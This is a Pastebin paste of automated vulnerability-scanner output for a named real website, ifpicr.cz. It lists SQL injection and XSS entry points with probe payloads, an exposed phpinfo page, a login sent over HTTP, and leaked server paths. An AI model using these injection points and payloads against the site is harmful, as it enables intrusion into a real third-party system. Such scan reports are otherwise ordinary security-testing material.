Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [High Possibility] SQL Injection
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL: http://www.ifpicr.cz/?rubrika=%27
- http://www.ifpicr.cz/?rubrika=%27&page=homepage
- http://www.ifpicr.cz/index.php?rubrika=%27&page=homepage
- http://www.ifpicr.cz/index.php?rubrika=%27
- |||
- Cross-site Scripting - XSS
- Cross Site Scripting was found at: "http://www.ifpicr.cz/index.php", using HTTP method POST.
- The sent post-data was: "query=<SCrIPT>alert("Je tu XSS :)")</SCrIPT>&page=search".
- The modified parameter was "query".
- This vulnerability affects ALL browsers.
- This vulnerability was found in the request with id 274.
- Cross Site Scripting was found at: "http://www.ifpicr.cz/index.php", using HTTP method POST.
- The sent post-data was: "query=Hello+World&page=<SCrIPT>alert("mQsW")</SCrIPT>".
- The modified parameter was "page".
- This vulnerability affects ALL browsers.
- This vulnerability was found in the request with id 294.
- The web server at "http://www.ifpicr.cz/" is vulnerable to Cross Site Tracing.
- This vulnerability was found in the request with id 314.
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Vulnerable URL: http://www.ifpicr.cz/index.php
- Parameter Name: page
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000086)</script>
- Vulnerable URL: http://www.ifpicr.cz/index.php
- Parameter Name: page
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00013E)</script>
- Vulnerable URL: http://www.ifpicr.cz/index.php
- Parameter Name: query
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00036C)</script>
- Vulnerable URL : http://www.ifpicr.cz/index.php
- Parameter Name: query
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000423)</script>
- |||
- Password Transmitted Over HTTP
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- Vulnerable URL: http://www.ifpicr.cz/hitparadask/login.php
- |||
- phpinfo() Information Disclosure
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Vulnerable URL: http://www.ifpicr.cz/phpinfo.php
- |||
- Programming Error Message
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- Vulnerable URL: http://www.ifpicr.cz/?rubrika=%27
- Identified Error Message: <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/data2/ifpicr/html/inc/fce.php</b> on line <b>157</b>
- <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/data2/ifpicr/html/inc/fce.php</b> on line <b>189</b>
- <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/data2/ifpicr/html/pages/clanky.php</b> on line <b>7</b>
- Parameter Name: rubrika
- Parameter Type: Querystring
- Attack Pattern: %27
- -----------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement